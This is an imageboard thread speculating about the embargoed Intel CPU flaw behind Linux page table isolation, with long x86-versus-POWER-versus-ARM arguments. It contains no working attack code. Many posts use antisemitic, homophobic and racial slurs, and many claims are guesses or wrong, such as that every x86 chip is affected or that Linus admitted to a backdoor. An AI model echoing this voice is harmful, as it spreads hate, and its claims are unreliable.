[–]▶ No.846180>>846194 >>846203 >>846211 >>846309 >>846431 >>846945 >>847307 >>848677 [Watch Thread][Show All Posts]
There is evidence of a massive Intel CPU hardware bug (currently under embargo) that directly affects big cloud providers like Amazon and Google. The fix will introduce notable performance penalties on Intel machines (30-35%).
People have noticed a recent development in the Linux kernel: a rather massive, important redesign (page table isolation) is being introduced very fast for kernel standards... and being backported! The "official" reason is to incorporate a mitigation called KASLR... which most security experts consider almost useless. There's also some unusual, suspicious stuff going on: the documentation is missing, some of the comments are redacted (https://twitter.com/grsecurity/status/947147105684123649) and people with Intel, Amazon and Google emails are CC'd.
According to one of the people working on it, PTI is only needed for Intel CPUs, AMD is not affected by whatever it protects against (https://lkml.org/lkml/2017/12/27/2). PTI affects a core low-level feature (virtual memory) and has severe performance penalties: 29% for an i7-6700 and 34% for an i7-3770S, according to Brad Spengler from grsecurity. PTI is simply not active for AMD CPUs. The kernel flag is named X86_BUG_CPU_INSECURE and its description is "CPU is insecure and needs kernel page table isolation".
Microsoft has been silently working on a similar feature since November: https://twitter.com/aionescu/status/930412525111296000
People are speculating on a possible massive Intel CPU hardware bug that directly opens up serious vulnerabilities on big cloud providers which offer shared hosting (several VMs on a single host), for example by letting a VM read from or write to another one.
Summary article: http://pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table (a bit outdated, follow @grsecurity, @scarybeasts and others on Twitter for up-to-date info)
▶ No.846194>>846203 >>846211 >>846297 >>846702 >>846831 >>846865 >>847003 >>847006 >>847474 >>848305
>>846180 (OP)
An actual conspiracy and /pol/ is nowhere to be seen. Funny how that works. Cowards. But then again they can count past 6 million anyway.
▶ No.846196>>846203 >>846216
Just one more bug for POWER to get there.
▶ No.846203>>846216
>>846180 (OP)
HOW SURPRISING!
https://github.com/xoreaxeaxeax/sandsifter/raw/master/references/domas_breaking_the_x86_isa_wp.pdf
>>846194
>An actual conspiracy
implying this isn't has vague has any conspiracy
>/pol/ is nowhere to be seen
Talking about paranoia, you know that keeping citing the bogeyman makes them appear don't you ?
>>846196
THIS
▶ No.846206
Notice that smell? Smells like... class action lawsuit. I can't wait to get my check over $12.46 from Intel.
▶ No.846211>>846220 >>847013
>>846180 (OP)
>The fix will introduce notable performance penalties on Intel machines (30-35%).
Why do I find this so hard to believe?
Maybe its because after decades of fanboys shitflinging numbers and conjecture that I tend to take these things with a grain of salt?
>'covered up'
Your thread is proof it most certainly not being covered up and companies aren't treating it with the same level of severity as your autistic ass because the numbers are likely grossly exaggerated
>>846194
/pol/ is a board about politics, not you're freetard pet soapbox, /tech/ really shouldn't be this either but the cancer is incurable
>inb4 either I'm a paid shill or a thousand freetards try to gaslight me because they are so delusional they think the world should have their same pet peeves
▶ No.846216>>846224 >>846240 >>847341
>>846196
>>846203
And you cringey LARPers are the worst cancer too. OPs body clearly states the bug doesn't even effect AMD processors. I hate people like you who think they're smarter than industry leaders. People who think architecture A is good because its 'different' and have such lack of regards for the industry to think re-inventing the wheel is necessary. There's very good reasons POWER failed and little good reasons to start using it again. Stick to what you're good at, preaching about Linux on anonymous imageboards, that's the only industry exposure you're going to get
▶ No.846220>>846223
>>846211
T.cianigger A.I
>>846182
What's interesting is why (you) are bringing it to our attention just now when it is almost already fixed. I wonder why they thought it was so important to fix in private? It's already laughably easy to make a worm that targets x86 CPU's design quirks. What could this possibly be that they are so worried about with the already numerous ways of pwning a x86 cpu?
▶ No.846223>>846226
>>846220
>It's already laughably easy to make a worm that targets x86 CPU's design quirks. What could this possibly be that they are so worried about with the already numerous ways of pwning a x86 cpu?
Maybe because high instruction density is not considered a security issue unless you're a retarded Pajeet, in which case just stick to making mobile apps
>T.cianigger A.I
<t. Someone who likes to pretend they know how computers work on an anonymous imageboard
▶ No.846224>>846225 >>846322
>>846216
>don't use power CPU's goy
>they aren't backdoored like almost all x86 cpu's goyim
>we can't (((help))) you recover your password if you forget it with power CPU's
▶ No.846225>>846230
>>846224
Your knowledge of the industry is truly flattering. I bet you know all about the POWER architecture and POWER assembly and everything. Your meme balls are truly telling
▶ No.846226>>846227 >>846322
>>846223
That entire post is a non-arguement. High instruction density has little to do with infiltrating a x86 system or pwning it after infiltration in a consistent manner across all x86 CPU's. You would want to be thinking something along the lines of system management mode you giant faggot.
▶ No.846227>>846234
>>846226
>You would want to be thinking something along the lines of system management mode you giant faggot.
X86 is not the only architecture with privileged modes. You and your infinite wisodm on computing architectures probably already knew that I'm sure
▶ No.846230>>846237
>>846225
Now power isn't the most optimal for energy effeiciency nor security I will grant you that. But it doesn't have the modern CISC to RISC converter and (((ME)))/(((PSP))) cancer that x86_64 has. Even though it has a similar cancer to the on die schedulers that modern x86_64 cpu's have to control heat, it is also RISC based by comparison thereby reducing heat. The power CPU's available for purchase also have a open firmware. This leads to it being easier to scale in commercial applications ontop of making bug fixing much easier at the assembly level. granted if you find a bug from running large tasks in parellel at high clock speeds there is most likely something wrong with the way it was fabricated, but I digress. No I don't have every single assembler instruction memorized for the power architecture. I am very informed on what CPU's are fucking botnets though in cy+3. So fuck off cianigger
▶ No.846234>>846322
>>846227
No there are those much smarter then me when it comes to computers. But I already knew about ARM's (((kikezone))) and MIPS' (((TEE's))). Nice job derailing you giant faggot.
▶ No.846237>>846240 >>846241 >>846245
>>846230
>But it doesn't have the modern CISC to RISC
The total die space and resources required for this is so incredibly negligible and is paramount for compatibility. You know, the thing you autists throw a massive fit over whenever its threatened to be compromised
X86s issues have been solved through architectural scaling. Its why we can have chips like Intel Atoms that can run fanless on batteries now. And POWER isn't going to prove a better solution to this
▶ No.846240>>846250
>>846216
>OPs body clearly states the bug doesn't even effect AMD processors
I didn't even directly cite anything AMD related (besides the pdf which is a general audit on x86 hardware).
>I hate people like you who think they're smarter than industry leaders
Because industry leaders can't be retarded ?
Maybe you should go out sometimes and take fresh air.
>There's very good reasons POWER failed and little good reasons to start using it again
You mean that intel having 90% of the market share and the blatant anti competitiveness that they did didn't influence other architectures from happening ?
>preaching about Linux on anonymous imageboards
.t buthurt bsdcuck
>>846237
>X86s issues have been solved
>have been solved
>solved
>Intel Atoms
>good
▶ No.846241>>846244
>>846237
Holy shit that non-sequiter. X86 CPU's are cancer because of the scaling you giant faggot. This created problems when it comes to heat reduction because the proccesor is always waiting for the schedulers to keep up with the instructions being ordered correctly. But at scale and load this creates much more heat then using a RISC architecture straight up and having the devs/compiler account for the order of operations at compile time for parellelization. By distributing the load over the proccessor you further reduce heat on RISC because of how cheap it is to transfer instructions across the die. But on x86 it's very expensive to do so thereby creating scheduler bottlenecks and heat problems due to shit order of operation with parellelization. Why do you think they can't go any further then 7nm right now in size on die? Because the heat from transfering instructions across the die is the cancer that is killing x86 from improving performance.
▶ No.846244>>846253
>>846241
Heat hasn't been an issue on x86 for years now. The inability to scale down to 7nm nodes has jack shit to do with heat. POWER and ARM experience identical thermal issues when they scale up to x86s level on desktops
▶ No.846245>>846246 >>847212
>>846237
>X86s issues have been solved through architectural scaling.
let's see them scale away this
35% PERFORMANCE HIT
bitch
▶ No.846246
>>846245
I honestly do not understand
▶ No.846250>>846252 >>846253 >>846258
>>846240
>You mean that intel having 90% of the market share and the blatant anti competitiveness that they did didn't influence other architectures from happening ?
Failing to deliver generational performance gains is the reason Intel and AMD dominate the supercomputer, PC, and high-end workstation markets. POWER died when Apple and eventually game consoles stopped using it and IBM can only blame their own incompetence
▶ No.846252
>>846250
>POWER died
So that's why google massively invests in it.
Kys intel shill.
▶ No.846253>>846257 >>846263 >>846322
>>846244
>heat hasn't been a issue
Why can't I go buy a fanless core I7 and run CPU intensive emulators like dolphin on it then without a fan? I can do that with a ARM cpu and they are complete shit compared to what they could be because of issue we have already been over.
>>846250
>saging this hard in shut it down mode
You're not wrong, IBM gave up on power for the general public as part of their backroom deals with (((them))). But after the cancer that is intel ME and AMD's PSP it is looking better all the time.
▶ No.846257>>846259 >>846262
>>846253
> I can do that with a ARM cpu
I dare you to emulate an i7 at native speed with an arm chip without a fan.
▶ No.846258>>846260 >>846265
>>846250
>Failing to deliver generational performance gains is the reason Intel and AMD dominate the supercomputer
Sure why not it's surly not because it's cheaper to buy AMD or that intel brakes their price when buy in enormous bundles.
And anti competitive behavior doesn't have influence AT ALL.
>PC, and high-end workstation markets
>amd dominating
WEW
>POWER died when Apple
Apple changed just because it was cheaper.
Apple has only made the past decade decisions because of money saving.
> and eventually game consoles
>consoles
You just mean nintendo.
Anyway nintendo went to ARM because they targeted audience that also wanted to have a transportable console.
▶ No.846259
>>846257
I dare you to not make bloated software.
▶ No.846260>>846264 >>846267
>>846258
Not just Nintendo.
Also NVIDIA SHIELD
▶ No.846262
>>846257
I didn't say that you giant faggot. I can run the same software but compiled for ARM without a fan. But which would require a i7 intel proccessor to get similar speeds if compiled for x86_64.
▶ No.846263>>846268
>>846253
>Why can't I run a chip significantly more powerful than the most powerful ARM chips without a fan guys?
I feel like you're being willfully ignorant
>gets triggered when I sage like it's a downvote
▶ No.846264
>>846260
> NVIDIA SHIELD
Again it's portable, you're ranting about an architecture which isn't meant to be a small portable system or/an to do intense graphical work.
You aren't making any sense intel shill please stop and go back to /g/ or reddit.
▶ No.846265>>846266
>>846258
No, I mean Sony and Microsoft both use AMD chips and Nintendo uses ARM. POWER is fucking dead
▶ No.846266>>846269
>>846265
>No, I mean Sony and Microsoft both use AMD
Because microsoft isn't compatible with intel maybe ?
>Nintendo uses ARM
Since the switch but otherwise they use power (and also amd) since the gamecube and before that it was NEC.
>POWER is fucking dead
And still actively developed.
Please just stop you aren't convincing anyone here besides ignorants, the market share of cpu architectures in general is very wide and diverse you can't just say that X is dead because X enormous company doesn't use it.
▶ No.846267>>846270
>>846260
>Nvidia shield
>Can barely run Half-Life 2 and Portal at minimal settings and its considered a bullet point it runs at all
>Runs Dolphin fine only at native Gamecube res
Hey faggot, my Intel Atom Bay Trails tablet does the same shit on the shitty HD series GPU. it's not impressive.
You know what thr shield can't do? This;
https://www.youtube.com/watch?v=dCPP-Gg_aMw
Repeat after me;
ARM was never good and never will be
And before you call me a kike, you're the one here shilling for an architecture madr by a tranny
▶ No.846268>>846271
>>846263
Were you born stupid? At 34x less energy used and no fan a qualcom snapdragon 800 SOC has about 1/8th of the performance of a fourth gen i7 https://archive.fo/RpDmv . This is before optimization on the ARM side which is still shit and while account for ARM being a shit risc implementation.
▶ No.846269>>846281
>>846266
>Since the switch but otherwise they use power (and also amd) since the gamecube and before that it was NEC.
You mean since The console that's fucking dead AKA the WiiU
▶ No.846270>>846273
>>846267
Your atom also uses a fuck ton more of electricty and doesn't have to convert from the CISC x86 to the RISC ARM instructions for running half life and such. If the dolphin emulator was well optimized software for ARM then it would fucking work better. Do realise though what a feet that is considering the electricty/energy usage of the nvidia tegra for that application though.
ARM is shit though
▶ No.846271>>846276
>>846268
You don't know shit abound how thermal scaling works. This is infuriating. Its shocking how little anyone here knows abound fucking technology and still hide their conjecture behind walls of rhetoric
What do you think will happen when they try scaling the same Snapdragon 800 to an i7s level? It won't still be the same 34 times less energy used. Remember all those ARMv8 servers companies promised in the early 2010s? What happened to them? Why were they never delivered in the same scale people hoped? Hey faggot, maybe reality got in the way
▶ No.846273>>846280 >>846283
>>846270
>If the dolphin emulator was well optimized software for ARM then it would fucking work better
You mean the emulator with the same portable codebase? Or what do you still think Android apps are written in Java?
Can your rhetoric even back why having a CISC <-> RISC converter even impacts the architecture itself when real world evidence is in complete contrary to your conjecture?
Do you understand why I hate people like you?
▶ No.846274>>846275 >>846277
i'm beginning to loose faith that linus isn't a cianigger or being paid of by every corporate kike under the sun to do things one way or another.
▶ No.846275
>>846274
Gotta make money to spend money
▶ No.846276>>846278
>>846271
Well no shit, ARM still has the out of order schedulers on die cancer that x86 has. Ontop of fucking pajeets and chinks being the ones programming the microcode for it. And the shitty ARM (((kikezone))) implementation and shitty compiler support for FOSS compilers because of ARM keeping the assembly somewhat secret.
>What do you think will happen when they try scaling the same Snapdragon 800 to an i7s level?
Well let's do some math. An ARM SOC that uses 34x less energy scaled times 34 to equal the power usage of an i7. Ontop of adding liquid nitrogen to a proper heatsink. It would scale quite nicely for GFLOPS proccessed per cycle assuming it didn't melt the cheap chink case of the phone. I can't find a example of someone doing such a thing though because the software/firmware for the ARM proccessors is locked down which means little overclocking can be achieved.
▶ No.846277
>>846274
Linus has confirmed some time ago that CIA/NSA came to him to install backdoor
https://www.youtube.com/watch?v=7gRsgkdfYJ8
Even his father who is a chairman at the European union talked about it at the EU.
https://www.youtube.com/watch?v=wwRYyWn7BEo
▶ No.846278>>846282
>>846276
>Well let's do some math. An ARM SOC that uses 34x less energy scaled times 34 to equal the power usage of an i7
Power and heat output absolutely do not scale linearly like that
▶ No.846280>>846283 >>846322
>>846273
>non-arguement and ad hominim, the post
<Can your rhetoric even back why having a CISC <-> RISC converter even impacts the architecture itself when real world evidence is in complete contrary to your conjecture?
>what is a performance or die space/heat penalty of converting one assembly language to another in real time
Do you get paid by the post pajeet?
▶ No.846281>>846283
>>846269
>You mean since The console that's fucking dead AKA the WiiU
You can't even read correctly.
The wiiu was never arm.
The Power architecture is used by nintendo since the gamecube.
http://nintendotoday.com/wii-u-cpu/
▶ No.846282>>846283
>>846278
I know, ARM is more effiecient at energy usage per cpu cycle as we have already established. Hence why that 1/8th gap would be made up with plenty of cycles to spare.
▶ No.846283>>846284 >>846286
>>846280
See
>>846273
Its okay to admit you have no idea what you're talking about lad
>>846281
Consoles do not use PowerPC anymore. Following semantics is hard I know
>>846282
Not how it works, especially not when it comes to thermals. And clock speed =/= IPC
▶ No.846284>>846285
>>846283
>Following semantics is hard I know
>wanting to be correct when obviously in the precedent post you said shit.
m8 you know that admitting being wrong with yourself is part of the process called growing up ?
You don't even have to post that you're wrong on the board just just can say "fuck I'm retarded" on your side and life goes on and nobody gives a dam.
▶ No.846285>>846292 >>846294
>>846284
No I think you have a difficult time understanding what I was saying
It's okay to admit you're wrong though
No consoles use POWER anymore. I am glad we got this established
▶ No.846286>>846287 >>846289
>>846283
>Not how it works, especially not when it comes to thermals. And clock speed =/= IPC
What the fuck does interproccess communication IPC have to do with how quickly instructions are being fed down the pipeline? In haswell it was increased to something like 6 instructions per cycle I think. I'd have to go look up what ARM's per cycle instruction count is though.
>Consoles do not use PowerPC anymore. Following semantics is hard I know
lul yes they do you giant homo sucking faggot chink see the wii u https://archive.fo/SfgGP
>Its okay to admit you have no idea what you're talking about lad
Wow care to eduacte us then instead of leaving us to our delusions if you happen to know the truth of the matter? kys
▶ No.846287>>846290
>>846286
IPC
Instructions Per Cycle
A concept well beyond you're understanding and it's self-evident
▶ No.846289
>>846286
Also in case you hadn't realized, the WiiU is depreciated by the Switch. That's the points I was trying to make. For some reason its difficult for people on those board to understand
▶ No.846290
>>846287
Wait I jumped the gun on that one. Fuck me
▶ No.846292
▶ No.846294
>>846285
>I am glad we got this established
You really learned how to keep appearances on you side, continue you're going to go far like that.
Btw here's your (You).
▶ No.846296>>846298
Also, the besr ARM chips typically aren't more than 8 Single Precision Instructions Per Cycle. ARM chips aren't as heavily pipelined as POWER or X86, because otherwise you do run into the same scaling issues and ARM really cannot afford to crawl out of its low-power computing segment
Anyhow I'm tired and probably won't be replying to this thread anymore so whatever
▶ No.846297
>>846194
There it is, the faggot who has to bring up /pol/ in every thread for no rational reason.
▶ No.846298>>846300
>>846296
>all modern proccessors are shit, the thread
Wow I am glad we both came to the same conclusion. So at the very least let's step into the power pc territory so atleast our shit proccessors don't have any fucking botnets on them by default like intel ME. You successfully derailed though. So here's your (you).
▶ No.846300>>846302
>>846298
You're not wrong. But next time try focusing on that instead of pretending that performance or thermals are the issues that need to be solved by reinventing the wheel
▶ No.846301
This is not going to be some trivial vulnerability. There is no reason something with such a huge performance hit would be rushed through into the mainstream/upstream.
▶ No.846302>>846304
>>846300
>still saging this hard
Well they energy and thermals are real issues if you care about true hardware security. Of which all proccessors in cy+3 are dogshit for. Improving them also has the side effect of better performance and or electrical power savings.
▶ No.846304
>>846302
Sage doesn't send a thread down a level you know?
▶ No.846307>>846315
As you can observe in this thread instead of sticking ot the initial post of OP the intel shills made it slide into an endless BS discussion read and learn from this anons.
▶ No.846309
▶ No.846310>>846315
Are there any predictions on how old this bug is? From the comments in the linux kernel it seems like it could potentially be very old.
▶ No.846311>>846315 >>846320 >>846321
This thread:
>OP - genuine security post
>Fuck Intel, we need more architectures like POWER
>No goy, Intel so based, x86 is best instruction set
>No it isn't
>Yes it is
>No it isn't
>Yes it is
>No it isn't
>Yes it is
And so on.
▶ No.846315>>846316 >>846317
>>846310
>Are there any predictions on how old this bug is?
Since it seems to be hardware issue design problem it seems like since the beginning the software upgrades made recently is only to mitigate the potential damage.
>>846311
this and see >>846307
What do you expect when some intel shill comes to defend their overlords and freetards who wants free/libre hardware.
▶ No.846316
>>846315
>it seems two times
I need to get some sleep.
▶ No.846317
>>846315
Your posts are retarded shitposts too.
▶ No.846320
>>846311
I'm sorry anon, but being anti-POWER fanboy and giving Intel due credit is the the same as being an Intel shill. You people are fucking stupid.
▶ No.846321
>>846311
this is an accurate summary
▶ No.846324
>>846323
This isn't the self-diagnosis thread.
▶ No.846410>>846416 >>846423 >>846481
Wow this went to shit fast, thanks to /pol/tards and ARMshit fanboys.
This seems to only be relevant to virtualization though, in which case I hope you can turn this "fix" off at run time. Another nail in the wintel coffin :-)
▶ No.846416
>>846410
>/pol/tards
What? Where?
▶ No.846423
>>846410
oh, but hey thanks to your crew giving valuable meta and post quality and anonymous identity discussion.
Informing and exclaiming how "/b/ is shit is" way more important than all of technology itself.
▶ No.846431>>846517
>>846180 (OP)
(((Embargo))) on information. Comments (((redacted))) on commits. I can see the glow coming off Linux from here. Not surprising when you see all the people with @intel.com in the source tree.
▶ No.846446
This is why cloud computing will always be a security risk. It is better to run your own hardware.
▶ No.846474
>>846322
fuck your right /tech/ needs to get rid of all of this wrongthink and white men.
▶ No.846517>>846566 >>846638
I see my thread is going well.
https://www.theregister.co.uk/2018/01/02/intel_cpu_design_flaw/
>A fundamental design flaw in Intel's processor chips has forced a significant redesign of the Linux and Windows kernels to defang the chip-level security bug.
>Programmers are scrambling to overhaul the open-source Linux kernel's virtual memory system. Meanwhile, Microsoft is expected to publicly introduce necessary changes to its Windows operating system in this month's Patch Tuesday: these changes were seeded to beta testers running fast-ring Windows Insider builds in November and December.
>Crucially, these updates to both Linux and Windows will incur a performance hit on Intel products. The effects are still being benchmarked, however we're looking at a ballpark figure of five to 30 per cent slow down, depending on the task and the processor model. More recent Intel chips have features to reduce the performance hit.
>Similar operating systems, such as Apple's 64-bit macOS, will also need to be updated -- the flaw is in the Intel x86 hardware, and it appears a microcode update can't address it. It has to be fixed in software at the OS level, or buy a new processor without the design blunder.
<Details of the vulnerability within Intel's silicon are under wraps: an embargo on the specifics is due to lift early this month, perhaps in time for Microsoft's Patch Tuesday
>>846431
>intel.com
But of course. Linux isn't about being open anymore. Its now all about protecting the interests of big business. It will be interesting to see how long this flaw was know and how long they covered it up.
▶ No.846566>>846611
>>846517
This is going to be brutal for Intel. They aren't talking about which models it affects, and they're trying to fix this all in secret. It must be a huge problem affecting a wide range of Intel CPUs.
▶ No.846589>>846596 >>846610
>The code they submited to the Linux kernel was purposefully obfusicated to hide what it was patching
Defend this, freefags
▶ No.846596
>>846589
All they did was remove comments from the code.
▶ No.846597
>>846481
Too late. His already ruined by cuckchan.
▶ No.846610>>846612 >>846614 >>846619 >>846650
>>846589
Embargoed security patches have been a thing for several decades in Linux, anime avatar LARPer. Would you rather have full disclosure of a bug that could be used to take over most of the world's servers in a few minutes via spreading through cloud providers?
▶ No.846611>>846628
>>846566
Preety sure it affects all x86 CPU's with a MMU. Literally all of them. They did name the function
>X86_BUG_CPU_INSECURE
In OP.
▶ No.846612
>>846610
Not him, but I would much rather have that than any kind of secrecy in supposedly open environments. The only thing they are "protecting" here is Intel's pocket book.
▶ No.846614
>>846610
>Would you rather have full disclosure of a bug that could be used to take over most of the world's servers in a few minutes via spreading through cloud providers?
Considering this is only one of many that could do so, yes full disclosure would be nice. With jews you lose faggots. Stop using x86 and ARM cancer.
▶ No.846619>>846620
>>846610
Embargo for something like 2-4 weeks would be a good compromise.
Holding on it for MONTHS so the intel exec's can dump their stock and the pajeet microsoft coder's could sell it to blackhats is unacceptable. So many OS vendors and dev's know about it there is no way it hasn't leaked out to the dark side by now. Servers are being raped as we speak.
Linux dev's going along with with this just proves they put their corporate master's interest's above their users.
▶ No.846620
>>846619
>Servers are being raped as we speak.
▶ No.846627>>848677
kek, say it when you spot it in image
▶ No.846628>>846635
>>846611
how can i find out if i have MMU? my pic above
▶ No.846630>>846631 >>846633
>>846322
>no id's
>The reason why /tech/ has a pph of 20.
▶ No.846631
>>846630
no for real anon, or are they all screwed cause of the evil inside?
▶ No.846633
>>846630
sorry, i just thought id make a funny of my misfortune
▶ No.846634>>846669 >>851102
Wow its literally fucking nothing unless you use Coffee Lake.
▶ No.846635>>846636
>>846628
Every Intel processor since the 286 (I think) has had an MMU.
▶ No.846636
▶ No.846638
>>846517
From the Register link
>It appears, from what AMD software engineer Tom Lendacky was suggesting above, that Intel's CPUs speculatively execute code potentially without performing security checks.
<but trust us, our ME is patched and totally secure now
gg Intel
▶ No.846640>>846644 >>846664
https://www.electronicsweekly.com/news/business/take-risks-says-intel-ceo-2017-12/
>In November Krzanich reported he had sold 245,743 Intel shares leaving him with the bare minimum of 250,000 shares required for the CEO to hold under Intel’s corporate regulations.
▶ No.846642>>846643
>I just returned my threadripper before Christmas because I figured my 4970k was "good enough".
Damn, unlucky start to the new year I guess.
I got it for $200 off on black Friday. I bet it's price will sky rocket now.
▶ No.846643
>>846642
Or is it 4790k? Whatever that Haswell was.
▶ No.846644>>846647
▶ No.846645>>846649 >>846698
Intel eternally BTFO'd by AMD on LKML
▶ No.846647
>>846644
never mind, I found your quote at the bottom of that other
▶ No.846648>>846875
so whats better to use, shity android that only plays half of youtube vids or linux with evil inside?
▶ No.846649>>847048
>>846645
I don't know how he managed to write that email without adding "lol"s everywhere
▶ No.846650>>846652
>>846610
>Would you rather have full disclosure of a bug that could be used to take over most of the world's servers in a few minutes via spreading through cloud providers?
Abso-fucking-lutely. Maybe that could end (((Intel)))'s reign of terror.
▶ No.846652
>>846650
good point, im sticking with linux with evil inside...
▶ No.846654
Feels insanely good to be running GNU+Linux on my Ryzen 5 1600 right now.
▶ No.846655>>846657 >>846659
Does no one care how the BSDs are affected by this?
▶ No.846657>>846659 >>846664
>>846655
Maybe them being last to know is payback for breaking disclosure last time.
▶ No.846659>>846660 >>846677 >>848209
>>846655
Because it affects everyone, it's a CPU level bug, Linux, BSD, Minix, Windows, probably Haiku as well.
No one is reading those mailing lists.
>>846657
Wasn't that just OpenBSD and only really once? I can think of three potential times:
1: a patch against KRACK iirc, they just silently patched it, the author gave consent then removed it.
2: Accidential mailing list leak with OpenSSL
3: Only legitimate one, can't remember what it was but they asked for some absurd cover time so they just told them to fuck off.
▶ No.846660>>846661 >>846668
>>846659
Who told who to fuck off?
▶ No.846661
>>846660
My memory could be really wrong but OpenBSD told a vendor to fuck themselves when they asked for a really long non disclosure time.
▶ No.846662
Jewtel has been knowingly shipping insecure chips in order to boost performance to keep AMD from catching up.
https://yarn.co/yarn-clip/aaba1aa5-149e-4e30-b8c7-1d04109be202
▶ No.846664
>>846657
They wanted months of embargo for KRACK and OBSD told them to fuck off then patched it. After the typical embargo time. Theo maybe a dick but at least he doesn't throw his users under the bus.
You should get 30days after notification then let the info drop. With so many people involved there is no way it hasn't leaked on to the darkweb by now. Only end users are getting hurt by this now. Waiting months only serves to help asshole's like
>>846640
>>846182
It is also very interesting that the big cloud players get a heads up but the little guys are going to be completely blindsided.
▶ No.846665>>846667 >>846669 >>846673 >>848095
Does this affect older models? What is the full list of processors affected?
Does it mean we're back to Sandy Bridge performance with only iGPU improvements?
Is Apple OS vulnerable too?
Does it affect only VMs and normal systems can avoid installing/running patches all the time?
>Passthrough LARPers BTFO
▶ No.846667>>846670
>>846665
No one knows the full details yet because of the (((embargo))).
But this could go all the way back way past sandy bridge. Past even the 1st 64bit Pentium.
Apple is effected because its an issue with the INTEL cpu not their OS. They will have to patch their OS just like everyone else to mitigate the CPU bug.
▶ No.846668>>846685 >>847047
>>846660
Any Intel CPU produced in the last 10 years is vulnerable
We're back to Nehalem
All OSes are vulnerable
It affects everything, it's a CPU bug that is so bad it has to be fixed by working around it on a software level.
▶ No.846669
>>846665
From what I've gathered,
all Intels for the past decade
>>846634
Yes
No, but if you don't care about security you might be able to disable it
▶ No.846670>>846671
>>846667
It could but I'd be surprised if they used the same speculative branching techniques that far back.
▶ No.846671>>846672 >>846674
>>846670
wait wasn't this bug introduced by intel fscking something up with dual page table management?
▶ No.846672>>846675
>>846671
Best details I've seen so far were in https://www.theregister.co.uk/2018/01/02/intel_cpu_design_flaw/ OP linked later.
Talks about speculative caching, and how a researcher had been trying to exploit it.
▶ No.846673
>>846665
>>Is Apple OS vulnerable too?
>be mac user
>Apple hasn't "refreshed" some of their mac lines since 2014
>OS update comes out
>update breaks blank root password patch for the 3nd time
>Already outdated systems now 1/3 slower
kek
▶ No.846674
>>846671
Lurk twenty years and you would know this bug has been discloused for months now.
▶ No.846675
>>846672
meant branching, not caching
▶ No.846676>>846681
So is 8ch going to get 30% slower now?
Can Ron please switch us to a Threadripper 1950x with 128GB of RAM?
▶ No.846677>>846678 >>846681
>>846659
>Because it affects everyone, it's a CPU level bug, Linux, BSD, Minix, Windows, probably Haiku as well.
>http://pythonsweetness.tumblr.com/post/169166980422/the-mysterious-case-of-the-linux-page-table:
"From a little digging through the FreeBSD source tree, it seems that so far other free operating systems are not implementing page table splitting"
This may turn out to just be a Windows,OSX, and Linux problem.
▶ No.846678>>846679
>>846677
FreeBSD is notorious for ignoring basic security precepts.
▶ No.846679>>846682 >>846683
>>846678
OpenBSD isn't and they don't seem affected either.
▶ No.846681>>846684
>>846677
There are likely other solutions to this problem that will not result in a performance hit. Hell, it sounds like just some simple optimization on the memory management side of things could solve this issue
>>846676
You can easily configure a server to optimize kernel and userspace better so its highly doubtful. Remember, this only effects userspace programs that want to access kernel space memory. Just push more rudimentary shit to userspace and reserve kernel space for only the most secure bits. Windows could be effected far less for all we know since they can actually afford to move more shit to userspace on the count of their pseudo-microkernel design but we won't know for sure until Patch Tuesday
▶ No.846682>>846694
>>846679
Maybe they are trying to keep extra-tight on the non-disclosure aspect to regain rep on that front?
▶ No.846683>>846686 >>846687 >>846688 >>846721
>>846679
If you understood how this bug worked you would realise that it affects anything with a MMU using the x86 arcitecture. Lurk twenty years now.
▶ No.846684
▶ No.846685
>>846668
Looks to be executing unsigned "predictive" code. It's essentially like your browser executing scripts from webpages that come up on search suggestions. Except on a Kernel and CPU level. You can see how bad this is.
▶ No.846686>>846689
>>846683
AMD stated it's not affecting their chips since their engineers aren't massive retards.
▶ No.846687>>847341
>>846683
ARM64 is getting some of the same patches too
https://lwn.net/Articles/740393/
▶ No.846688>>846690 >>847053
>>846683
If that was the case then a software fix wouldn't work to begin with you giga retard.
▶ No.846689>>846708
>>846686
Holy shit were you born stupid? Did you even research how the bug works? Lurk twenty years and everything is a fucking botnet you giant faggot. Do you really expect any of these liars to tell the truth, jewtel or (((amd)))? They won't.
▶ No.846690>>846695
>>846688
I am aware of this you giant faggot. That's because it won't fix it permenently. It's like a bandaid ontop of the giant steaming pile of shit that is the x86 architecture and it's clones.
▶ No.846694>>846703
>>846682
>Maybe they are trying to keep extra-tight on the non-disclosure aspect to regain rep on that front?
A) OpenBSD will not sign NDA's. If Linus signed a NDA over this then he completely sold you out to protect intel.
B) The rep they have now is they wont cover for shitty hardware vendors. They have always honored reasonable embargo's.Waiting MONTHS to sit on patches only fucks over the users in the end.
The coverup is always worse then the crime. I have a feeling this may turn in to a major shitshow of who-knew-what-and-when.
▶ No.846695>>846699
>>846690
Are you the OP of that retro home computer thread?
You're right about the software patch though, the nice thing about a rushed software patch is that there are going to be more bugs to exploit in it, probably for a long time to come.
▶ No.846696>>846704
>Inb4 this only impacts Linux because of its monolithic kernel design and Microsoft mitigates this by simply pushing some drivers to userspace
Windows wins again freetards
▶ No.846698>>847577 >>847584
>>846645
if (Muhcpu= Intel)
cout << "Block." << endl;
▶ No.846699
>>846695
>dox yourself for the cianigger A.I goy
No to both. This is that wifi shit all over again.
▶ No.846702
>>846194
>some faggot brings up /pol/ in a derogative manner in every thread
>not astroturfing
Really activates my almonds
▶ No.846703>>846706 >>846718
>>846694
I've been looking for OpenBSD's response (none that I can see), but came across KARL in the process. (KARL is a re-link of the Kernel on boot, with a random object ordering.) Do you think that this is why they haven't bothered?
▶ No.846705>>847196
>>846704
I love how you showcase the fact you have exactly 0 comprehension on the nature of the bug and dare post the brainlet meme
▶ No.846706>>846707 >>846712
>>846703
Do the BSDs handle virtual memory differently than GNU/Linux?
▶ No.846707
>>846706
No because of the POSIX standard, it is a CPU bug in x86 proccessors and the MMU https://archive.fo/GSnCc and has nothing to do with the way virtual memory is handled in linux. They are just modifying it to make it ever so slightly more difficult to abuse.
▶ No.846708>>847341
>>846689
AMD doesn't run unsigned unsafe speculative code like Intel does. Did YOU read anything they were saying? Also, if it affected AMD the headlines wouldn't be all about Intel.
▶ No.846710>>846713
How hard is this going to fuck up virtual machines? I want to continue running Windows in a VM with hardware passthrough so I can play vidya but this seems like it might shit up the performance.
▶ No.846712>>846729
>>846706
No idea: I would assume not because you're basically just implementing the Intel interface to the MMU. It's pretty much a complex hardware interface.
I wonder about this comment in the patch, maybe it's a red herring, in the function map_ldt_struct:
+ /*
+ * Map it RO so the easy to find address is not a primary
+ * target via some kernel interface which misses a
+ * permission check.
+ */
Maybe some syscalls were leaking kernel space addresses, leaving them open to exploit?
